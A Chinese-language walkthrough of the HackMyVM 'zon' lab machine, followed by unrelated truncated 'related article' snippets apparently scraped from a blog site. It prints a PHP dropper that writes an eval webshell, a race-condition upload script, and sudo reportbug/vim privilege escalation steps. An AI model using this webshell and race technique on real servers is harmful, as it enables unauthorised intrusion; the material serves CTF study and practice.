hackmyvm靶场--zon
环境
攻击机kali
靶机
未知
主机探测
因为在同一个局域网内使用ARP协议探测存活主机
靶机为192.168.56.128
端口探测
常见的80和22端口
那么一定是寻找web漏洞拿shell了
后台扫描
后台扫描常用dirsearch和gobuster,有时候小字典可能不太行,可以尝试换个大点的字典试试
gobuster dir -w /var/www/html/dict/directory-list-lowercase-2.3-medium.txt -u http://192.168.56.128 -t 200 -x php,zip,jsp,asp,bak,jpg,png,mp4,mkv,txt,html,md,git,7z,rar,db,log,docx,xlsx -b 400-404,500
扫出一个后台目录choose.php,并且发现了uploads目录,猜测是文件上传
发现需要上传zip文件,里面是jpeg文件
先上传个正常的
查看一下uploads目录
可以正常访问
想要利用文件上传来拿到shell无非需要满足两个条件
1、成功上传木马文件
2、服务端可以解析该文件
这时,我们上传一个php的木马试试,我的压缩包里面放了一个php文件
结果显示给文件不是jpeg,会被删除
删除两个字,哈哈,让我想到了文件上传的常见考点–条件竞争
我们猜测服务器处理php文件是这样的,当我们在浏览器点击上传键的时候,服务器会先把文件上传到一个目录下,此靶机就是前面找到的uploads目录,然后服务器的脚本代码会对文件的后缀名进行检查,若不是jpeg,那么就会删除,而条件竞争就是利用服务器判断的间隙访问木马文件,在此间隙中,木马已经在服务器中,只不过还来不及判断删除就被我们访问到了,具体的知识涉及到多线程。
实现步骤:
首先准备create-shell.php这个炮灰shell文件,里面写一下代码
<?php fwrite(fopen('shell.php','w'),'<?php @eval($_POST[11]);?>');?>
开启一个访问的Python脚本,作用为验证shell是否成功上传
import requestsurl1 = "http://127.0.0.1/upload/upload/create-shell.php" # 定义访问 creat-shell.php
url2 = "http://127.0.0.1/upload/upload/shell.php"
# 定义访问 shell.phpwhile True: # 定义死循环html1 = requests.get(url1) # 请求 create-shell.phphtml2 = requests.get(url2) # 请求 shell.phpif html2.status_code == 200: # 如果 shell.php 返回的http状态码为200print('Good job,Win Win Win') # 打印 Good job.....break上传该文件并且使用burp抓包
在最下面输入数字1作为我们的爆破点
接着设置payload
把刚才的1遍历到1000,实现的结果就是burp会发送一摸一样的文件1000次,实现了对服务器的爆破
先运行Python脚本,随后开启burp的爆破模式,一段时间后成功竞争到该文件,说明shell已经成功上传
提权
拿到shell
因为蚁剑环境下不是一个真实的shell,需要我们重新反弹一个
升级shell
/usr/bin/script -qc /bin/bash /dev/null
在网站目录下发现了upload.php上传逻辑点,可以发现服务器确实是先上传了文件后进行判断删除
在网站的目录下发现了一个hashDB.sh的bash脚本,功能它自己写了,验证数据库的完整性
发现了mysqldump -u admin -p这段代码
尝试登录,成功
ssh登录freddie
拿到user.txt
sudo查看发现reportbug有提权的可能性
file /usr/bin/reportbug
python可执行脚本
以root运行
sudo reportbug
一段乱输之后发现有一个vim编辑器提权
拿下root.txtTOC]
相关文章:
hackmyvm靶场--zon
环境 攻击机kali 靶机 未知 主机探测 因为在同一个局域网内使用ARP协议探测存活主机 靶机为192.168.56.128 端口探测 常见的80和22端口 那么一定是寻找web漏洞拿shell了 后台扫描 后台扫描常用dirsearch和gobuster,有时候小字典可能不太行,可以尝试换个大点…...
atcoder abc372 启发式合并, dp
A delete 代码: #include <bits.stdc.h>using namespace std;int main() {string s;cin >> s;for(auto t: s) if(t ! .) cout << t; } B 3 ^ A 思路:三进制转换,可以参考二进制,先把当前可以加入的最大的3的…...
CentOS Stream 9部署MariaDB
1、更新系统软件包 sudo dnf update 2、安装MariaDB软件包(替代mysql) sudo dnf install mariadb-server 3、安装MariaDB服务 sudo systemctl enable --now mariadb 4、检查MariaDB服务状态 sudo systemctl status mariadb 5、配置MariaDB安全性 sudo my…...
【Leetcode:997. 找到小镇的法官 + 入度出度】
🚀 算法题 🚀 🌲 算法刷题专栏 | 面试必备算法 | 面试高频算法 🍀 🌲 越难的东西,越要努力坚持,因为它具有很高的价值,算法就是这样✨ 🌲 作者简介:硕风和炜,…...
大数据Flink(一百二十三):五分钟上手Flink MySQL连接器
文章目录 五分钟上手Flink MySQL连接器 一、创建数据库表 二、创建session集群 三、源表查询 四、窗口计算 五、结果数据写回数据库 五分钟上手Flink MySQL连接器 MySQL Connector可以将本地或远程的MySQL数据库连接到Flink中&#x…...
SYN Flood攻击原理,SYN Cookie算法
SYN Flood是一种非常危险而常见的Dos攻击方式。到目前为止,能够有效防范SYN Flood攻击的手段并不多,SYN Cookie就是其中最著名的一种。 1. SYN Flood攻击原理 SYN Flood攻击是一种典型的拒绝服务(Denial of Service)攻击。所谓的拒绝服务攻击就是通过进…...
期末速成笔记1)
计组(蒋)期末速成笔记1
蒋本珊计组期末不挂科复习笔记 第1章 概论 第2章 数据的机器层次表示 第3章 指令系统 第4章 数值的机器运算 第5章 存储系统和结构 第6章 中央处理器 第7章 总线 第1章 概论 蒋本珊计组期末不挂科复习笔记知道你快考试了,莫慌! 第1章 概论1.1 冯诺依曼计…...
(17))
mysql学习教程,从入门到精通,SQL 更新数据(UPDATE 语句)(17)
1、SQL 更新数据(UPDATE 语句) SQL UPDATE 需要指定要更新的表、要修改的列以及新值,并且通常会通过WHERE子句来指定哪些行需要被更新。下面是一个简单的示例,说明如何使用UPDATE语句。 假设我们有一个名为employees的表…...
【吊打面试官系列-MySQL面试题】MyISAM 表格将在哪里存储,并且还提供其存储格式?
大家好,我是锋哥。今天分享关于【MyISAM 表格将在哪里存储,并且还提供其存储格式?】面试题,希望对大家有帮助; MyISAM 表格将在哪里存储,并且还提供其存储格式? 每个 MyISAM 表格以三种格式存储…...
常用的图像增强的算法之间的联系和区别
Unsharp Mask (USM)、拉普拉斯算子、直方图均衡化和伽马增强是图像处理中常见的技术,但它们在原理、作用和应用场景上有显著不同。以下是对这些方法的详细比较: 1. Unsharp Mask (USM) 原理:USM 是通过对图像进行模糊处理(如高斯…...
SpringBoot+Vue考试系统免费分享
源码说明: 这是一个开源的SpringBoot与Vue开发的在线考试系统。经过站长测试,系统稳定可用,允许重复考试。 环境: 需要安装的环境包括Node.js v14.21.3、JDK8、Maven以及MySQL 5.7。 前端部署教程: 执行 npm inst…...
——FLV官方文档下载)
音视频入门基础:FLV专题(1)——FLV官方文档下载
一、FLV简介 Flash Video(简称FLV),是一种网络视频格式,用作流媒体格式,它的出现有效地解决了视频文件导入Flash后,使导出的SWF文件体积庞大,不能在网络上有效使用等缺点。 一般FLV文件包在SW…...
使用c#制作一个小型桌面程序
封装dll 首先使用visual stdio 创建Dll新项目,然后属性管理器导入自己的工程属性表(如果没有可以参考visual stdio 如何配置opencv等其他环境) 创建完成后 系统会自动生成一些文件,其中 pch.cpp 先不要修改,pch.h中先导入自己需…...
Clip studio paint百度云下载:附安装包+教程
首先补一个介绍,Clip Studio Paint(即CSP):这是一款专业的绘画和漫画创作软件,拥有丰富的绘画工具,适合漫画创作者使用。其界面友好,工具齐全,能够满足漫画创作中的各种需求。 用过…...
从Yargs源码学习中间件的设计
yargs中间件介绍 yargs 是一个用于解析命令行参数的流行库,它能帮助开发者轻松地定义 CLI(命令行接口),并提供参数处理、命令组织、help文本自动生成等功能。今天我们来学习一下它对中间件的支持。 中间件的API详细信息࿰…...
高级I/O知识分享【epoll || Reactor ET,LT模式】
博客主页:花果山~程序猿-CSDN博客 文章分栏:Linux_花果山~程序猿的博客-CSDN博客 关注我一起学习,一起进步,一起探索编程的无限可能吧!让我们一起努力,一起成长! 目录 一,接口 epo…...
Matlab 的.m 文件批量转成py文件
在工作中碰到了一个问题,需要将原来用matlab gui做出来的程序改为python程序,因为涉及到很多文件,所以在网上搜了搜有没有直接能转化的库。参考了【Matlab】一键Matlab代码转python代码详细教程_matlab2python-CSDN博客 这位博主提到的matla…...
【软考】传输层协议TCP与UDP
目录 1. TCP1.1 说明1.2 三次握手 2. UDP3. 例题3.1 例题1 1. TCP 1.1 说明 1.TCP(Transmission Control Protocol,传输控制协议)是整个 TCP/IP 协议族中最重要的协议之一。2.它在IP提供的不可靠数据服务的基础上为应用程序提供了一个可靠的、面向连接的、全双工的…...
Arthas dashboard(当前系统的实时数据面板)
文章目录 二、命令列表2.1 jvm相关命令2.1.1 dashboard(当前系统的实时数据面板) 二、命令列表 2.1 jvm相关命令 2.1.1 dashboard(当前系统的实时数据面板) 使用场景: 在 Arthas 中,dashboard 命令用于提…...
微服务保护之熔断降级
在微服务架构中,服务之间的调用是通过网络进行的,网络的不确定性和依赖服务的不可控性,可能导致某个服务出现异常或性能问题,进而引发整个系统的故障,这被称为 微服务雪崩。为了防止这种情况发生,常用的一些…...
【3D设计】资源获取方法论:7个精准化策略助你高效获取专业级素材
【3D设计】资源获取方法论:7个精准化策略助你高效获取专业级素材 【免费下载链接】sketchfab sketchfab download userscipt for Tampermonkey by firefox only 项目地址: https://gitcode.com/gh_mirrors/sk/sketchfab 在3D内容创作领域,优质资源…...
全栈实战应用:基于快马AI快速构建带投稿审稿系统的《构石》期刊官网
全栈实战应用:基于快马AI快速构建带投稿审稿系统的《构石》期刊官网 最近接手了一个学术期刊官网的开发需求,需要实现完整的在线投稿和审稿流程。这个项目涉及前后端联调和数据库设计,正好可以试试用InsCode(快马)平台来快速搭建原型。下面分…...
在语音对话中,OpenClaw 的语音唤醒词定制化如何实现?
语音唤醒词定制化这件事,听起来像是给机器一个专属的暗号,喊对了它才搭理你。在OpenClaw这类语音对话系统里,实现这个功能,本质上是在解决一个“如何在嘈杂的声音环境里,准确识别出某个特定词汇”的问题。 这和我们平时…...
Flux 图像生成 API 集成指南
在本篇文章中,我们将为您介绍 Flux 图像生成 API 的集成步骤。通过该 API,您可以输入自定义参数以生成官方的 Flux 图像。Flux 图像生成 API 是一个强大的工具,适用于需要图像生成的应用场景,如内容创作、游戏开发和广告设计等。 …...
开源大模型部署新选择:cv_unet_image-colorization低门槛AI视觉实践
开源大模型部署新选择:cv_unet_image-colorization低门槛AI视觉实践 1. 引言 你是否翻出过家里的老相册,看着那些泛黄的黑白照片,想象着它们当年真实的色彩?或者,作为一名内容创作者,你是否曾为一张构图完…...
道德迷宫工程:让伦理审查永远卡关
当伦理成为迷宫在数字化转型的浪潮中,软件系统深度渗透医疗、金融、公共治理等核心领域。伦理审查本应是技术创新的安全阀,却被一种名为道德迷宫工程(Ethical Maze Engineering) 的策略系统性破坏——通过精心设计的流程复杂性、模…...
Matlab进阶技巧:如何用hatchfill2和legendflex打造专业级纹理柱状图
Matlab数据可视化进阶:用hatchfill2与legendflex打造学术级纹理柱状图 在科研论文或商业报告中,单调的纯色柱状图往往难以清晰传达多维数据的层次关系。当需要区分5种以上的数据类别时,即使用尽所有高对比度颜色,依然会面临辨识度…...
LaTeX投稿Elsevier期刊必备:elsarticle.cls从安装到实战避坑指南
LaTeX投稿Elsevier期刊必备:elsarticle.cls从安装到实战避坑指南 科研工作者向Elsevier投稿时,elsarticle.cls文档类是最常用的工具之一。不同于基础教程,本文将聚焦实际投稿过程中的高频痛点,从环境配置到排版细节,提…...
【Isaac Sim 4.5.0】从安装到启动:Ubuntu环境下的疑难杂症排查与修复实录
1. 环境准备:从零搭建Isaac Sim的硬件与软件基础 在Ubuntu系统上部署Isaac Sim之前,硬件兼容性检查是避免后续问题的关键第一步。我的RTX 4090显卡在安装过程中就遇到了显存识别问题,后来发现是PCIe供电不足导致的性能降频。建议先用lspci -…...
计算机硕,是走算法岗还是开发岗?
咳咳,煮啵说句可能得罪人的话——这个问题本身就问错了。不是说这个问题不重要,而是大部分人在问这个问题的时候,脑子里的决策框架就是拧的。他们把”算法”和”开发”想象成两条泾渭分明的路,然后试图在岔路口做一个一劳永逸的选…...